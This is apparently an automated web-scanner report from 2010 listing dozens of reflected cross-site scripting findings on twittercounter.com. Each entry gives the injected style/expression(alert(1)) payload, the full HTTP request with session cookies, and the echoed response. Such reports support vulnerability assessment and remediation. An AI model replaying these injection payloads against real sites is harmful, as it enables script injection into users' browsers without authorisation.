<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/LakePalin71577"style="x:expression(alert(1))"03baa161a60" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f16"style%3d"x%3aexpression(alert(1))"01922a6b406 was submitted in the REST URL parameter 1. This input was echoed as 11f16"style="x:expression(alert(1))"01922a6b406 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Oprah11f16"style%3d"x%3aexpression(alert(1))"01922a6b406 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:48 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/Oprah11f16"style="x:expression(alert(1))"01922a6b406" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed09"style%3d"x%3aexpression(alert(1))"4ebb4b3d3fe was submitted in the REST URL parameter 1. This input was echoed as 3ed09"style="x:expression(alert(1))"4ebb4b3d3fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /PDVSALaEstancia3ed09"style%3d"x%3aexpression(alert(1))"4ebb4b3d3fe?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:04 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/PDVSALaEstancia3ed09"style="x:expression(alert(1))"4ebb4b3d3fe" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e5e"style%3d"x%3aexpression(alert(1))"93fa34ec153 was submitted in the REST URL parameter 1. This input was echoed as 16e5e"style="x:expression(alert(1))"93fa34ec153 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /PECChris16e5e"style%3d"x%3aexpression(alert(1))"93fa34ec153?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:24 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23693
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/PECChris16e5e"style="x:expression(alert(1))"93fa34ec153" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b110"style%3d"x%3aexpression(alert(1))"8a2b7d6289d was submitted in the REST URL parameter 1. This input was echoed as 8b110"style="x:expression(alert(1))"8a2b7d6289d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Randy_Gage8b110"style%3d"x%3aexpression(alert(1))"8a2b7d6289d HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:28:41 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/Randy_Gage8b110"style="x:expression(alert(1))"8a2b7d6289d" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92628"style%3d"x%3aexpression(alert(1))"76c5c98f925 was submitted in the REST URL parameter 1. This input was echoed as 92628"style="x:expression(alert(1))"76c5c98f925 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /RyanSeacrest92628"style%3d"x%3aexpression(alert(1))"76c5c98f925 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:04 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23845
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/RyanSeacrest92628"style="x:expression(alert(1))"76c5c98f925" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da16"style%3d"x%3aexpression(alert(1))"dee7dac87f7 was submitted in the REST URL parameter 1. This input was echoed as 2da16"style="x:expression(alert(1))"dee7dac87f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ShopRite2da16"style%3d"x%3aexpression(alert(1))"dee7dac87f7 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:11 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/ShopRite2da16"style="x:expression(alert(1))"dee7dac87f7" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9913c"style%3d"x%3aexpression(alert(1))"ae1733a7392 was submitted in the REST URL parameter 1. This input was echoed as 9913c"style="x:expression(alert(1))"ae1733a7392 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /SiteSpect9913c"style%3d"x%3aexpression(alert(1))"ae1733a7392 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:20 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/SiteSpect9913c"style="x:expression(alert(1))"ae1733a7392" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f6a1"style%3d"x%3aexpression(alert(1))"b9db6a0b1be was submitted in the REST URL parameter 1. This input was echoed as 8f6a1"style="x:expression(alert(1))"b9db6a0b1be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /THE_REAL_SHAQ8f6a1"style%3d"x%3aexpression(alert(1))"b9db6a0b1be HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:25 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/THE_REAL_SHAQ8f6a1"style="x:expression(alert(1))"b9db6a0b1be" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f2c1"style%3d"x%3aexpression(alert(1))"efb06379e6c was submitted in the REST URL parameter 1. This input was echoed as 6f2c1"style="x:expression(alert(1))"efb06379e6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /TheCounter6f2c1"style%3d"x%3aexpression(alert(1))"efb06379e6c HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:29 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/TheCounter6f2c1"style="x:expression(alert(1))"efb06379e6c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e372"style%3d"x%3aexpression(alert(1))"a7a4b276164 was submitted in the REST URL parameter 1. This input was echoed as 8e372"style="x:expression(alert(1))"a7a4b276164 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /TheEllenShow8e372"style%3d"x%3aexpression(alert(1))"a7a4b276164 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:38 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23668
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/TheEllenShow8e372"style="x:expression(alert(1))"a7a4b276164" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a179"style%3d"x%3aexpression(alert(1))"af6eb5805b4 was submitted in the REST URL parameter 1. This input was echoed as 6a179"style="x:expression(alert(1))"af6eb5805b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3470d"style%3d"x%3aexpression(alert(1))"9acb9278be was submitted in the REST URL parameter 1. This input was echoed as 3470d"style="x:expression(alert(1))"9acb9278be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /a4agarwal3470d"style%3d"x%3aexpression(alert(1))"9acb9278be HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:54 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/a4agarwal3470d"style="x:expression(alert(1))"9acb9278be" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173b8"style%3d"x%3aexpression(alert(1))"a822d189b09 was submitted in the REST URL parameter 1. This input was echoed as 173b8"style="x:expression(alert(1))"a822d189b09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /accarrino173b8"style%3d"x%3aexpression(alert(1))"a822d189b09 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:06 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/accarrino173b8"style="x:expression(alert(1))"a822d189b09" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e07"style%3d"x%3aexpression(alert(1))"8b4967cfae0 was submitted in the REST URL parameter 1. This input was echoed as f3e07"style="x:expression(alert(1))"8b4967cfae0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /amchartsf3e07"style%3d"x%3aexpression(alert(1))"8b4967cfae0/amcharts.php HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:21:32 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/amchartsf3e07"style="x:expression(alert(1))"8b4967cfae0/amcharts.php" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f57"style%3d"x%3aexpression(alert(1))"b589afa8ef4 was submitted in the REST URL parameter 2. This input was echoed as 63f57"style="x:expression(alert(1))"b589afa8ef4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /amcharts/amcharts.php63f57"style%3d"x%3aexpression(alert(1))"b589afa8ef4 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:22:14 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/amcharts/amcharts.php63f57"style="x:expression(alert(1))"b589afa8ef4" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae24"style%3d"x%3aexpression(alert(1))"347b1f31da2 was submitted in the REST URL parameter 1. This input was echoed as 2ae24"style="x:expression(alert(1))"347b1f31da2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3c4d"style%3d"x%3aexpression(alert(1))"c95765b12f was submitted in the REST URL parameter 2. This input was echoed as d3c4d"style="x:expression(alert(1))"c95765b12f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4de70"style%3d"x%3aexpression(alert(1))"4a5dc1a4756 was submitted in the REST URL parameter 1. This input was echoed as 4de70"style="x:expression(alert(1))"4a5dc1a4756 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb48f"style%3d"x%3aexpression(alert(1))"281a4ee7a1a was submitted in the REST URL parameter 2. This input was echoed as bb48f"style="x:expression(alert(1))"281a4ee7a1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 400af"style%3d"x%3aexpression(alert(1))"051bc8f1c53 was submitted in the REST URL parameter 1. This input was echoed as 400af"style="x:expression(alert(1))"051bc8f1c53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e767"style%3d"x%3aexpression(alert(1))"8b99fb01902 was submitted in the REST URL parameter 2. This input was echoed as 2e767"style="x:expression(alert(1))"8b99fb01902 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e97a"style%3d"x%3aexpression(alert(1))"9e7c6156d52 was submitted in the REST URL parameter 1. This input was echoed as 3e97a"style="x:expression(alert(1))"9e7c6156d52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
